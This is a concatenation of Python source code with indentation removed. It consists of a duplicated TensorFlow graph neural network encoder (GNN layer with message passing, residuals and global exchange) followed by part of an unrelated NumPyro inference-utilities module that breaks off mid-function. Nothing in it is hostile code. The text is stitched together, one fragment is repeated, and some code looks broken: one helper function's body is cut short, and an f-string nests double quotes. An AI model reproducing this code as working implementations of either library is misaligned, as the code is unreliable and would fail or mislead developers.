Args:
inputs: A GNNInput containing the following fields:
node_features: float32 tensor of shape [V, D], the original representation
of each node in the graph.
adjacency_lists: an tuple of tensors of shape [E, 2] which represents an adjacency
list for a given edge type. Concretely,
adjacency_list[l][k,:] == [v, u]
means that the k-th edge of type l connects node v to node u.
node_to_graph_map: int32 tensor of shape [V], where node_to_graph_map[v] = i
means that node v belongs to graph i in the batch.
num_graphs: int32 tensor of shape [], specifying number of graphs in batch.
training: A bool representing whether the model is training or evaluating.
Returns:
A tensor of shape [V, hidden_dim], where hidden_dim was defined in the layer
initialisation. The tensor represents the encoding of the initial node_features by the
GNN framework.
"""
initial_node_features: tf.Tensor = inputs.node_features
adjacency_lists = inputs.adjacency_lists
cur_node_representations = self._initial_projection_layer(initial_node_features)
# Layer loop.
last_node_representations = cur_node_representations
for layer_idx, mp_layer in enumerate(self._mp_layers):
if training:
cur_node_representations = tf.nn.dropout(
cur_node_representations, rate=self._params["layer_input_dropout_rate"]
)
# Pass residuals through:
if layer_idx % self._residual_every_num_layers == 0:
tmp = cur_node_representations
if layer_idx > 0:
cur_node_representations += last_node_representations
cur_node_representations /= 2
last_node_representations = tmp
# Apply this message passing layer.
cur_node_representations = mp_layer(
MessagePassingInput(
node_embeddings=cur_node_representations, adjacency_lists=adjacency_lists
),
training=training,
)
if layer_idx and layer_idx % self._global_exchange_every_num_layers == 0:
cur_node_representations = self._global_exchange_layers[str(layer_idx)](
GraphGlobalExchangeInput(
node_embeddings=cur_node_representations,
node_to_graph_map=inputs.node_to_graph_map,
num_graphs=inputs.num_graphs,
),
training=training,
)
# If required, apply a LayerNorm:
if self._use_inter_layer_layernorm:
cur_node_representations = self._inter_layer_layernorms[layer_idx](
cur_node_representations
)
# Apply dense layer, if needed.
if layer_idx % self._dense_every_num_layers == 0:
cur_node_representations = self._dense_layers[str(layer_idx)](
cur_node_representations, training=training
)
return cur_node_representations
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
| """GNN Encoder class."""
from itertools import count
from typing import Any, Dict, NamedTuple, List, Tuple, Optional
import tensorflow as tf
from dpu_utils.tf2utils import MLP
from tf2_gnn.utils.param_helpers import get_activation_function
from .message_passing import (
MessagePassing,
MessagePassingInput,
get_message_passing_class,
)
from .graph_global_exchange import (
GraphGlobalExchangeInput,
GraphGlobalExchange,
GraphGlobalMeanExchange,
GraphGlobalGRUExchange,
GraphGlobalMLPExchange,
)
from .nodes_to_graph_representation import (
WeightedSumGraphRepresentation,
NodesToGraphRepresentationInput,
)
class GNNInput(NamedTuple):
"""Input named tuple for the GNN."""
node_features: tf.Tensor
adjacency_lists: Tuple[tf.Tensor, ...]
node_to_graph_map: tf.Tensor
num_graphs: tf.Tensor
class GNN(tf.keras.layers.Layer):
"""Encode graph states using a combination of graph message passing layers and dense layers
Example usage:
>>> layer_input = GNNInput(
... node_features = tf.random.normal(shape=(5, 3)),
... adjacency_lists = (
... tf.constant([[0, 1], [1, 2], [3, 4]], dtype=tf.int32),
... tf.constant([[1, 2], [3, 4]], dtype=tf.int32),
... tf.constant([[2, 0]], dtype=tf.int32)
... ),
... node_to_graph_map = tf.fill(dims=(5,), value=0),
... num_graphs = 1,
... )
...
>>> params = GNN.get_default_hyperparameters()
>>> params["hidden_dim"] = 12
>>> layer = GNN(params)
>>> output = layer(layer_input)
>>> print(output)
tf.Tensor(..., shape=(5, 12), dtype=float32)
"""
@classmethod
def get_default_hyperparameters(cls, mp_style: Optional[str] = None) -> Dict[str, Any]:
"""Get the default hyperparameter dictionary for the class."""
these_hypers = {
"message_calculation_class": "rgcn",
"initial_node_representation_activation": "tanh",
"dense_intermediate_layer_activation": "tanh",
"num_layers": 4,
"dense_every_num_layers": 2,
"residual_every_num_layers": 2,
"use_inter_layer_layernorm": False,
"hidden_dim": 16,
"layer_input_dropout_rate": 0.0,
"global_exchange_mode": "gru", # One of "mean", "mlp", "gru"
"global_exchange_every_num_layers": 2,
"global_exchange_weighting_fun": "softmax", # One of "softmax", "sigmoid"
"global_exchange_num_heads": 4,
"global_exchange_dropout_rate": 0.2,
} # type: Dict[str, Any]
if mp_style is not None:
these_hypers["message_calculation_class"] = mp_style
message_passing_class = get_message_passing_class(
these_hypers["message_calculation_class"]
)
message_passing_hypers = message_passing_class.get_default_hyperparameters()
message_passing_hypers.update(these_hypers)
return message_passing_hypers
def __init__(self, params: Dict[str, Any]):
"""Initialise the layer."""
super().__init__()
self._params = params
self._hidden_dim = params["hidden_dim"]
self._num_layers = params["num_layers"]
self._dense_every_num_layers = params["dense_every_num_layers"]
self._residual_every_num_layers = params["residual_every_num_layers"]
self._use_inter_layer_layernorm = params["use_inter_layer_layernorm"]
self._initial_node_representation_activation_fn = get_activation_function(
params["initial_node_representation_activation"]
)
self._dense_intermediate_layer_activation_fn = get_activation_function(
params["dense_intermediate_layer_activation"]
)
self._message_passing_class = get_message_passing_class(
params["message_calculation_class"]
)
if not params["global_exchange_mode"].lower() in {"mean", "mlp", "gru"}:
raise ValueError(
f"Unknown global_exchange_mode mode {params['global_exchange_mode']} - has to be one of 'mean', 'mlp', 'gru'!"
)
self._global_exchange_mode = params["global_exchange_mode"]
self._global_exchange_every_num_layers = params["global_exchange_every_num_layers"]
self._global_exchange_weighting_fun = params["global_exchange_weighting_fun"]
self._global_exchange_num_heads = params["global_exchange_num_heads"]
self._global_exchange_dropout_rate = params["global_exchange_dropout_rate"]
# Layer member variables. To be filled in in the `build` method.
self._initial_projection_layer: tf.keras.layers.Layer = None
self._mp_layers: List[MessagePassing] = []
self._inter_layer_layernorms: List[tf.keras.layers.Layer] = []
self._dense_layers: Dict[str, tf.keras.layers.Layer] = {}
self._global_exchange_layers: Dict[str, GraphGlobalExchange] = {}
def build(self, tensor_shapes: GNNInput):
"""Build the various layers in the model.
Args:
tensor_shapes: A GNNInput of tensor shapes.
Returns:
Nothing, but initialises the layers in the model based on the tensor shapes given.
"""
# First, we go through the input shapes and make sure that anything which might vary batch
# to batch (number of nodes / number of edges) is set to None.
initial_node_features_shape: tf.TensorShape = tensor_shapes.node_features
variable_node_features_shape = tf.TensorShape((None, initial_node_features_shape[1]))
adjacency_list_shapes = tensor_shapes.adjacency_lists
embedded_shape = tf.TensorShape((None, self._hidden_dim))
with tf.name_scope(f"{self._message_passing_class.__name__}_GNN"):
# Then we construct the layers themselves:
with tf.name_scope("gnn_initial_node_projection"):
self._initial_projection_layer = tf.keras.layers.Dense(
units=self._hidden_dim,
use_bias=False,
activation=self._initial_node_representation_activation_fn,
)
self._initial_projection_layer.build(variable_node_features_shape)
# Construct the graph message passing layers.
for layer_idx in range(self._num_layers):
with tf.name_scope(f"Layer_{layer_idx}"):
with tf.name_scope("MessagePassing"):
self._mp_layers.append(
self._message_passing_class(self._params)
)
self._mp_layers[-1].build(
MessagePassingInput(embedded_shape, adjacency_list_shapes)
)
# If required, prepare for a LayerNorm:
if self._use_inter_layer_layernorm:
with tf.name_scope(f"LayerNorm"):
self._inter_layer_layernorms.append(
tf.keras.layers.LayerNormalization()
)
self._inter_layer_layernorms[-1].build(embedded_shape)
# Construct the per-node dense layers.
if layer_idx % self._dense_every_num_layers == 0:
with tf.name_scope(f"Dense"):
self._dense_layers[str(layer_idx)] = tf.keras.layers.Dense(
units=self._hidden_dim,
use_bias=False,
activation=self._dense_intermediate_layer_activation_fn,
)
self._dense_layers[str(layer_idx)].build(embedded_shape)
if (
layer_idx
and layer_idx % self._global_exchange_every_num_layers == 0
):
with tf.name_scope(f"Global_Exchange"):
if self._global_exchange_mode.lower() == "mean":
exchange_layer_class = GraphGlobalMeanExchange
elif self._global_exchange_mode.lower() == "gru":
exchange_layer_class = GraphGlobalGRUExchange
elif self._global_exchange_mode.lower() == "mlp":
exchange_layer_class = GraphGlobalMLPExchange
exchange_layer = exchange_layer_class(
hidden_dim=self._hidden_dim,
weighting_fun=self._global_exchange_weighting_fun,
num_heads=self._global_exchange_num_heads,
dropout_rate=self._global_exchange_dropout_rate,
)
exchange_layer.build(
GraphGlobalExchangeInput(
node_embeddings=tf.TensorShape(
(None, self._hidden_dim)
),
node_to_graph_map=tf.TensorShape((None,)),
num_graphs=tf.TensorShape(()),
)
)
self._global_exchange_layers[
str(layer_idx)
] = exchange_layer
super().build(tensor_shapes)
call_input_spec = (
GNNInput(
node_features=tf.TensorSpec(shape=variable_node_features_shape, dtype=tf.float32),
adjacency_lists=tuple(
tf.TensorSpec(shape=(None, 2), dtype=tf.int32)
for _ in range(len(adjacency_list_shapes))
),
node_to_graph_map=tf.TensorSpec(shape=(None,), dtype=tf.int32),
num_graphs=tf.TensorSpec(shape=(), dtype=tf.int32),
),
tf.TensorSpec(shape=(), dtype=tf.bool),
)
setattr(self, "call", tf.function(func=self.call, input_signature=call_input_spec))
def call(self, inputs: GNNInput, training: bool = False):
"""
Args:
inputs: A GNNInput containing the following fields:
node_features: float32 tensor of shape [V, D], the original representation
of each node in the graph.
adjacency_lists: an tuple of tensors of shape [E, 2] which represents an adjacency
list for a given edge type. Concretely,
adjacency_list[l][k,:] == [v, u]
means that the k-th edge of type l connects node v to node u.
node_to_graph_map: int32 tensor of shape [V], where node_to_graph_map[v] = i
means that node v belongs to graph i in the batch.
num_graphs: int32 tensor of shape [], specifying number of graphs in batch.
training: A bool representing whether the model is training or evaluating.
Returns:
A tensor of shape [V, hidden_dim], where hidden_dim was defined in the layer
initialisation. The tensor represents the encoding of the initial node_features by the
GNN framework.
"""
initial_node_features: tf.Tensor = inputs.node_features
adjacency_lists = inputs.adjacency_lists
cur_node_representations = self._initial_projection_layer(initial_node_features)
# Layer loop.
last_node_representations = cur_node_representations
for layer_idx, mp_layer in enumerate(self._mp_layers):
if training:
cur_node_representations = tf.nn.dropout(
cur_node_representations, rate=self._params["layer_input_dropout_rate"]
)
# Pass residuals through:
if layer_idx % self._residual_every_num_layers == 0:
tmp = cur_node_representations
if layer_idx > 0:
cur_node_representations += last_node_representations
cur_node_representations /= 2
last_node_representations = tmp
# Apply this message passing layer.
cur_node_representations = mp_layer(
MessagePassingInput(
node_embeddings=cur_node_representations, adjacency_lists=adjacency_lists
),
training=training,
)
if layer_idx and layer_idx % self._global_exchange_every_num_layers == 0:
cur_node_representations = self._global_exchange_layers[str(layer_idx)](
GraphGlobalExchangeInput(
node_embeddings=cur_node_representations,
node_to_graph_map=inputs.node_to_graph_map,
num_graphs=inputs.num_graphs,
),
training=training,
)
# If required, apply a LayerNorm:
if self._use_inter_layer_layernorm:
cur_node_representations = self._inter_layer_layernorms[layer_idx](
cur_node_representations
)
# Apply dense layer, if needed.
if layer_idx % self._dense_every_num_layers == 0:
cur_node_representations = self._dense_layers[str(layer_idx)](
cur_node_representations, training=training
)
return cur_node_representations
if __name__ == "__main__":
import doctest
doctest.testmod(optionflags=doctest.ELLIPSIS)
|
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
from contextlib import contextmanager
from functools import partial
import warnings
import numpy as np
from jax import device_get, jacfwd, lax, random, value_and_grad
from jax.flatten_util import ravel_pytree
import jax.numpy as jnp
from jax.tree_util import tree_map
import numpyro
from numpyro.distributions import constraints
from numpyro.distributions.transforms import biject_to
from numpyro.distributions.util import is_identically_one, sum_rightmost
from numpyro.handlers import condition, replay, seed, substitute, trace
from numpyro.infer.initialization import init_to_uniform, init_to_value
from numpyro.util import not_jax_tracer, soft_vmap, while_loop
__all__ = [
"find_valid_initial_params",
"get_potential_fn",
"log_density",
"log_likelihood",
"potential_energy",
"initialize_model",
"Predictive",
]
ModelInfo = namedtuple(
"ModelInfo", ["param_info", "potential_fn", "postprocess_fn", "model_trace"]
)
ParamInfo = namedtuple("ParamInfo", ["z", "potential_energy", "z_grad"])
def log_density(model, model_args, model_kwargs, params):
"""
(EXPERIMENTAL INTERFACE) Computes log of joint density for the model given
latent values ``params``.
:param model: Python callable containing NumPyro primitives.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict params: dictionary of current parameter values keyed by site
name.
:return: log of joint density and a corresponding model trace
"""
model = substitute(model, data=params)
model_trace = trace(model).get_trace(*model_args, **model_kwargs)
log_joint = jnp.zeros(())
for site in model_trace.values():
if site["type"] == "sample":
value = site["value"]
intermediates = site["intermediates"]
scale = site["scale"]
if intermediates:
log_prob = site["fn"].log_prob(value, intermediates)
else:
log_prob = site["fn"].log_prob(value)
if (scale is not None) and (not is_identically_one(scale)):
log_prob = scale * log_prob
log_prob = jnp.sum(log_prob)
log_joint = log_joint + log_prob
return log_joint, model_trace
class _without_rsample_stop_gradient(numpyro.primitives.Messenger):
"""
Stop gradient for samples at latent sample sites for which has_rsample=False.
"""
def postprocess_message(self, msg):
if (
msg["type"] == "sample"
and (not msg["is_observed"])
and (not msg["fn"].has_rsample)
):
msg["value"] = lax.stop_gradient(msg["value"])
# TODO: reconsider this logic
# here we clear all the cached value so that gradients of log_prob(value) w.r.t.
# all parameters of the transformed distributions match the behavior of
# TransformedDistribution(d, transform) in Pyro with transform.cache_size == 0
msg["intermediates"] = None
def get_importance_trace(model, guide, args, kwargs, params):
"""
(EXPERIMENTAL) Returns traces from the guide and the model that is run against it.
The returned traces also store the log probability at each site.
.. note:: Gradients are blocked at latent sites which do not have reparametrized samplers.
"""
guide = substitute(guide, data=params)
with _without_rsample_stop_gradient():
guide_trace = trace(guide).get_trace(*args, **kwargs)
model = substitute(replay(model, guide_trace), data=params)
model_trace = trace(model).get_trace(*args, **kwargs)
for tr in (guide_trace, model_trace):
for site in tr.values():
if site["type"] == "sample":
if "log_prob" not in site:
value = site["value"]
intermediates = site["intermediates"]
scale = site["scale"]
if intermediates:
log_prob = site["fn"].log_prob(value, intermediates)
else:
log_prob = site["fn"].log_prob(value)
if (scale is not None) and (not is_identically_one(scale)):
log_prob = scale * log_prob
site["log_prob"] = log_prob
return model_trace, guide_trace
def transform_fn(transforms, params, invert=False):
"""
(EXPERIMENTAL INTERFACE) Callable that applies a transformation from the `transforms`
dict to values in the `params` dict and returns the transformed values keyed on
the same names.
:param transforms: Dictionary of transforms keyed by names. Names in
`transforms` and `params` should align.
:param params: Dictionary of arrays keyed by names.
:param invert: Whether to apply the inverse of the transforms.
:return: `dict` of transformed params.
"""
if invert:
transforms = {k: v.inv for k, v in transforms.items()}
return {k: transforms[k](v) if k in transforms else v for k, v in params.items()}
def constrain_fn(model, model_args, model_kwargs, params, return_deterministic=False):
"""
(EXPERIMENTAL INTERFACE) Gets value at each latent site in `model` given
unconstrained parameters `params`. The `transforms` is used to transform these
unconstrained parameters to base values of the corresponding priors in `model`.
If a prior is a transformed distribution, the corresponding base value lies in
the support of base distribution. Otherwise, the base value lies in the support
of the distribution.
:param model: a callable containing NumPyro primitives.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict params: dictionary of unconstrained values keyed by site
names.
:param bool return_deterministic: whether to return the value of `deterministic`
sites from the model. Defaults to `False`.
:return: `dict` of transformed params.
"""
def substitute_fn(site):
if site["name"] in params:
if site["type"] == "sample":
with helpful_support_errors(site):
return biject_to(site["fn"].support)(params[site["name"]])
else:
return params[site["name"]]
substituted_model = substitute(model, substitute_fn=substitute_fn)
model_trace = trace(substituted_model).get_trace(*model_args, **model_kwargs)
return {
k: v["value"]
for k, v in model_trace.items()
if (k in params) or (return_deterministic and (v["type"] == "deterministic"))
}
def _unconstrain_reparam(params, site):
name = site["name"]
if name in params:
p = params[name]
support = site["fn"].support
with helpful_support_errors(site):
t = biject_to(support)
# in scan, we might only want to substitute an item at index i, rather than the whole sequence
i = site["infer"].get("_scan_current_index", None)
if i is not None:
event_dim_shift = t.codomain.event_dim - t.domain.event_dim
expected_unconstrained_dim = len(site["fn"].shape()) - event_dim_shift
# check if p has additional time dimension
if jnp.ndim(p) > expected_unconstrained_dim:
p = p[i]
if support in [constraints.real, constraints.real_vector]:
return p
value = t(p)
log_det = t.log_abs_det_jacobian(p, value)
log_det = sum_rightmost(
log_det, jnp.ndim(log_det) - jnp.ndim(value) + len(site["fn"].event_shape)
)
if site["scale"] is not None:
log_det = site["scale"] * log_det
numpyro.factor("_{}_log_det".format(name), log_det)
return value
def potential_energy(model, model_args, model_kwargs, params, enum=False):
"""
(EXPERIMENTAL INTERFACE) Computes potential energy of a model given unconstrained params.
Under the hood, we will transform these unconstrained parameters to the values
belong to the supports of the corresponding priors in `model`.
:param model: a callable containing NumPyro primitives.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict params: unconstrained parameters of `model`.
:param bool enum: whether to enumerate over discrete latent sites.
:return: potential energy given unconstrained parameters.
"""
if enum:
from numpyro.contrib.funsor import log_density as log_density_
else:
log_density_ = log_density
substituted_model = substitute(
model, substitute_fn=partial(_unconstrain_reparam, params)
)
# no param is needed for log_density computation because we already substitute
log_joint, model_trace = log_density_(
substituted_model, model_args, model_kwargs, {}
)
return -log_joint
def _init_to_unconstrained_value(site=None, values={}):
if site is None:
return partial(_init_to_unconstrained_value, values=values)
def find_valid_initial_params(
rng_key,
model,
*,
init_strategy=init_to_uniform,
enum=False,
model_args=(),
model_kwargs=None,
prototype_params=None,
forward_mode_differentiation=False,
validate_grad=True,
):
"""
(EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns an initial
valid unconstrained value for all the parameters. This function also returns
the corresponding potential energy, the gradients, and an
`is_valid` flag to say whether the initial parameters are valid. Parameter values
are considered valid if the values and the gradients for the log density have
finite values.
:param jax.random.PRNGKey rng_key: random number generator seed to
sample from the prior. The returned `init_params` will have the
batch shape ``rng_key.shape[:-1]``.
:param model: Python callable containing Pyro primitives.
:param callable init_strategy: a per-site initialization function.
:param bool enum: whether to enumerate over discrete latent sites.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param dict prototype_params: an optional prototype parameters, which is used
to define the shape for initial parameters.
:param bool forward_mode_differentiation: whether to use forward-mode differentiation
or reverse-mode differentiation. Defaults to False.
:param bool validate_grad: whether to validate gradient of the initial params.
Defaults to True.
:return: tuple of `init_params_info` and `is_valid`, where `init_params_info` is the tuple
containing the initial params, their potential energy, and their gradients.
"""
model_kwargs = {} if model_kwargs is None else model_kwargs
init_strategy = (
init_strategy if isinstance(init_strategy, partial) else init_strategy()
)
# handle those init strategies differently to save computation
if init_strategy.func is init_to_uniform:
radius = init_strategy.keywords.get("radius")
init_values = {}
elif init_strategy.func is _init_to_unconstrained_value:
radius = 2
init_values = init_strategy.keywords.get("values")
else:
radius = None
def cond_fn(state):
i, _, _, is_valid = state
return (i < 100) & (~is_valid)
def body_fn(state):
i, key, _, _ = state
key, subkey = random.split(key)
if radius is None or prototype_params is None:
# XXX: we don't want to apply enum to draw latent samples
model_ = model
if enum:
from numpyro.contrib.funsor import enum as enum_handler
if isinstance(model, substitute) and isinstance(model.fn, enum_handler):
model_ = substitute(model.fn.fn, data=model.data)
elif isinstance(model, enum_handler):
model_ = model.fn
# Wrap model in a `substitute` handler to initialize from `init_loc_fn`.
seeded_model = substitute(seed(model_, subkey), substitute_fn=init_strategy)
model_trace = trace(seeded_model).get_trace(*model_args, **model_kwargs)
constrained_values, inv_transforms = {}, {}
for k, v in model_trace.items():
if (
v["type"] == "sample"
and not v["is_observed"]
and not v["fn"].is_discrete
):
constrained_values[k] = v["value"]
with helpful_support_errors(v):
inv_transforms[k] = biject_to(v["fn"].support)
params = transform_fn(
inv_transforms,
{k: v for k, v in constrained_values.items()},
invert=True,
)
else: # this branch doesn't require tracing the model
params = {}
for k, v in prototype_params.items():
if k in init_values:
params[k] = init_values[k]
else:
params[k] = random.uniform(
subkey, jnp.shape(v), minval=-radius, maxval=radius
)
key, subkey = random.split(key)
potential_fn = partial(
potential_energy, model, model_args, model_kwargs, enum=enum
)
if validate_grad:
if forward_mode_differentiation:
pe = potential_fn(params)
z_grad = jacfwd(potential_fn)(params)
else:
pe, z_grad = value_and_grad(potential_fn)(params)
z_grad_flat = ravel_pytree(z_grad)[0]
is_valid = jnp.isfinite(pe) & jnp.all(jnp.isfinite(z_grad_flat))
else:
pe = potential_fn(params)
is_valid = jnp.isfinite(pe)
z_grad = None
return i + 1, key, (params, pe, z_grad), is_valid
def _find_valid_params(rng_key, exit_early=False):
init_state = (0, rng_key, (prototype_params, 0.0, prototype_params), False)
if exit_early and not_jax_tracer(rng_key):
# Early return if valid params found. This is only helpful for single chain,
# where we can avoid compiling body_fn in while_loop.
_, _, (init_params, pe, z_grad), is_valid = init_state = body_fn(init_state)
if not_jax_tracer(is_valid):
if device_get(is_valid):
return (init_params, pe, z_grad), is_valid
# XXX: this requires compiling the model, so for multi-chain, we trace the model 2-times
# even if the init_state is a valid result
_, _, (init_params, pe, z_grad), is_valid = while_loop(
cond_fn, body_fn, init_state
)
return (init_params, pe, z_grad), is_valid
# Handle possible vectorization
if rng_key.ndim == 1:
(init_params, pe, z_grad), is_valid = _find_valid_params(
rng_key, exit_early=True
)
else:
(init_params, pe, z_grad), is_valid = lax.map(_find_valid_params, rng_key)
return (init_params, pe, z_grad), is_valid
def _get_model_transforms(model, model_args=(), model_kwargs=None):
model_kwargs = {} if model_kwargs is None else model_kwargs
model_trace = trace(model).get_trace(*model_args, **model_kwargs)
inv_transforms = {}
# model code may need to be replayed in the presence of deterministic sites
replay_model = False
has_enumerate_support = False
for k, v in model_trace.items():
if v["type"] == "sample" and not v["is_observed"]:
if v["fn"].is_discrete:
has_enumerate_support = True
if not v["fn"].has_enumerate_support:
raise RuntimeError(
"MCMC only supports continuous sites or discrete sites "
f"with enumerate support, but got {type(v["fn"]).__name__}."
)
else:
support = v["fn"].support
with helpful_support_errors(v, raise_warnings=True):
inv_transforms[k] = biject_to(support)
# XXX: the following code filters out most situations with dynamic supports
args = ()
if isinstance(support, constraints._GreaterThan):
args = ("lower_bound",)
elif isinstance(support, constraints._Interval):
args = ("lower_bound", "upper_bound")
for arg in args:
if not isinstance(getattr(support, arg), (int, float)):
replay_model = True
elif v["type"] == "deterministic":
replay_model = True
return inv_transforms, replay_model, has_enumerate_support, model_trace
def get_potential_fn(
model,
inv_transforms,
*,
enum=False,
replay_model=False,
dynamic_args=False,
model_args=(),
model_kwargs=None,
):
"""
(EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns a
function which, given unconstrained parameters, evaluates the potential
energy (negative log joint density). In addition, this returns a
function to transform unconstrained values at sample sites to constrained
values within their respective support.
:param model: Python callable containing Pyro primitives.
:param dict inv_transforms: dictionary of transforms keyed by names.
:param bool enum: whether to enumerate over discrete latent sites.
:param bool replay_model: whether we need to replay model in
`postprocess_fn` to obtain `deterministic` sites.
:param bool dynamic_args: if `True`, the `potential_fn` and
`constraints_fn` are themselves dependent on model arguments.
When provided a `*model_args, **model_kwargs`, they return
`potential_fn` and `constraints_fn` callables, respectively.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:return: tuple of (`potential_fn`, `postprocess_fn`). The latter is used
to constrain unconstrained samples (e.g. those returned by HMC)
to values that lie within the site's support, and return values at
`deterministic` sites in the model.
"""
if dynamic_args:
def potential_fn(*args, **kwargs):
return partial(potential_energy, model, args, kwargs, enum=enum)
def postprocess_fn(*args, **kwargs):
if replay_model:
# XXX: we seed to sample discrete sites (but not collect them)
model_ = seed(model.fn, 0) if enum else model
return partial(
constrain_fn, model_, args, kwargs, return_deterministic=True
)
else:
return partial(transform_fn, inv_transforms)
else:
model_kwargs = {} if model_kwargs is None else model_kwargs
potential_fn = partial(
potential_energy, model, model_args, model_kwargs, enum=enum
)
if replay_model:
model_ = seed(model.fn, 0) if enum else model
postprocess_fn = partial(
constrain_fn,
model_,
model_args,
model_kwargs,
return_deterministic=True,
)
else:
postprocess_fn = partial(transform_fn, inv_transforms)
return potential_fn, postprocess_fn
def _guess_max_plate_nesting(model_trace):
"""
Guesses max_plate_nesting by using model trace.
This optimistically assumes static model
structure.
"""
sites = [site for site in model_trace.values() if site["type"] == "sample"]
dims = [
frame.dim
for site in sites
for frame in site["cond_indep_stack"]
if frame.dim is not None
]
max_plate_nesting = -min(dims) if dims else 0
return max_plate_nesting
# TODO: follow pyro.util.check_site_shape logics for more complete validation
def _validate_model(model_trace):
# XXX: this validates plate statements under `enum`
sites = [site for site in model_trace.values() if site["type"] == "sample"]
for site in sites:
batch_dims = len(site["fn"].batch_shape)
if site.get("_control_flow_done", False):
batch_dims = batch_dims - 1 # remove time dimension under scan
plate_dims = -min([0] + [frame.dim for frame in site["cond_indep_stack"]])
assert (
plate_dims >= batch_dims
), "Missing plate statement for batch dimensions at site {}".format(
site["name"]
)
def initialize_model(
rng_key,
model,
*,
init_strategy=init_to_uniform,
dynamic_args=False,
model_args=(),
model_kwargs=None,
forward_mode_differentiation=False,
validate_grad=True,
):
"""
(EXPERIMENTAL INTERFACE) Helper function that calls :func:`~numpyro.infer.util.get_potential_fn`
and :func:`~numpyro.infer.util.find_valid_initial_params` under the hood
to return a tuple of (`init_params_info`, `potential_fn`, `postprocess_fn`, `model_trace`).
:param jax.random.PRNGKey rng_key: random number generator seed to
sample from the prior. The returned `init_params` will have the
batch shape ``rng_key.shape[:-1]``.
:param model: Python callable containing Pyro primitives.
:param callable init_strategy: a per-site initialization function.
See :ref:`init_strategy` section for available functions.
:param bool dynamic_args: if `True`, the `potential_fn` and
`constraints_fn` are themselves dependent on model arguments.
When provided a `*model_args, **model_kwargs`, they return
`potential_fn` and `constraints_fn` callables, respectively.
:param tuple model_args: args provided to the model.
:param dict model_kwargs: kwargs provided to the model.
:param bool forward_mode_differentiation: whether to use forward-mode differentiation
or reverse-mode differentiation. By default, we use reverse mode but the forward
mode can be useful in some cases to improve the performance. In addition, some
control flow utility on JAX such as `jax.lax.while_loop` or `jax.lax.fori_loop`
only supports forward-mode differentiation. See
`JAX's The Autodiff Cookbook <https://jax.readthedocs.io/en/latest/notebooks/autodiff_cookbook.html>`_
for more information.
:param bool validate_grad: whether to validate gradient of the initial params.
Defaults to True.
:return: a namedtupe `ModelInfo` which contains the fields
(`param_info`, `potential_fn`, `postprocess_fn`, `model_trace`), where
`param_info` is a namedtuple `ParamInfo` containing values from the prior
used to initiate MCMC, their corresponding potential energy, and their gradients;
`postprocess_fn` is a callable that uses inverse transforms
to convert unconstrained HMC samples to constrained values that
lie within the site's support, in addition to returning values
at `deterministic` sites in the model.
"""
model_kwargs = {} if model_kwargs is None else model_kwargs
substituted_model = substitute(
seed(model, rng_key if jnp.ndim(rng_key) == 1 else rng_key[0]),
substitute_fn=init_strategy,
)
(
inv_transforms,
replay_model,
has_enumerate_support,
model_trace,
) = _get_model_transforms(substituted_model, model_args, model_kwargs)
# substitute param sites from model_trace to model so
# we don't need to generate again parameters of `numpyro.module`
model = substitute(
model,
data={
k: site["value"]
for k, site in model_trace.items()
if site["type"] in ["param"]
},
)
constrained_values = {
k: v["value"]
for k, v in model_trace.items()
if v["type"] == "sample" and not v["is_observed"] and not v["fn"].is_discrete
}
if has_enumerate_support:
from numpyro.contrib.funsor import config_enumerate, enum
if not isinstance(model, enum):
max_plate_nesting = _guess_max_plate_nesting(model_trace)
_validate_model(model_trace)
model = enum(config_enumerate(model), -max_plate_nesting - 1)
potential_fn, postprocess_fn = get_potential_fn(
model,
inv_transforms,
replay_model=replay_model,
enum=has_enumerate_support,
dynamic_args=dynamic_args,
model_args=model_args,
model_kwargs=model_kwargs,
)
init_strategy = (
init_strategy if isinstance(init_strategy, partial) else init_strategy()
)
if (init_strategy.func is init_to_value) and not replay_model:
init_values = init_strategy.keywords.get("values")
unconstrained_values = transform_fn(inv_transforms, init_values, invert=True)
init_strategy = _init_to_unconstrained_value(values=unconstrained_values)
prototype_params = transform_fn(inv_transforms, constrained_values, invert=True)
(init_params, pe, grad), is_valid = find_valid_initial_params(
rng_key,
substitute(
model,
data={
k: site["value"]
for k, site in model_trace.items()
if site["type"] in ["plate"]
},
),
init_strategy=init_strategy,
enum=has_enumerate_support,
model_args=model_args,
model_kwargs=model_kwargs,
prototype_params=prototype_params,
forward_mode_differentiation=forward_mode_differentiation,
validate_grad=validate_grad,
)
if not_jax_tracer(is_valid):
if device_get(~jnp.all(is_valid)):
with numpyro.validation_enabled(), trace() as tr:
# validate parameters
substituted_model(*model_args, **model_kwargs)
# validate values
for site in tr.values():
if site["type"] == "sample":
with warnings.catch_warnings(record=True) as ws:
site["fn"]._validate_sample(site["value"])
if len(ws) > 0:
for w in ws:
# at site information to the warning message
w.message.args = (
"Site {}: {}".format(
site["name"], w.message.args[0]
),
) + w.message.args[1:]
warnings.showwarning(
w.message,
w.category,
w.filename,
w.lineno,
file=w.file,
line=w.line,
)
raise RuntimeError(
"Cannot find valid initial parameters. Please check your model again."
)
return ModelInfo(
ParamInfo(init_params, pe, grad), potential_fn, postprocess_fn, model_trace
)
def _predictive(
rng_key,
model,
posterior_samples,
batch_shape,
return_sites=None,
infer_discrete=False,
parallel=True,
model_args=(),
model_kwargs={},
):
masked_model = numpyro.handlers.mask(model, mask=False)
if infer_discrete:
# inspect the model to get some structure
rng_key, subkey = random.split(rng_key)
batch_ndim = len(batch_shape)
prototype_sample = tree_map(
lambda x: jnp.reshape(x, (-1,) + jnp.shape(x)[batch_ndim:])[0],
posterior_samples,
)
prototype_trace = trace(
seed(substitute(masked_model, prototype_sample), subkey)
).get_trace(*model_args, **model_kwargs)
first_available_dim = -_guess_max_plate_nesting(prototype_trace) - 1
def single_prediction(val):
rng_key, samples = val
if infer_discrete:
from numpyro.contrib.funsor import config_enumerate
from numpyro.contrib.funsor.discrete import _sample_posterior
model_trace = prototype_trace
temperature = 1
pred_samples = _sample_posterior(
config_enumerate(condition(model, samples)),
first_available_dim,
temperature,
rng_key,
*model_args,
**model_kwargs,
)
else:
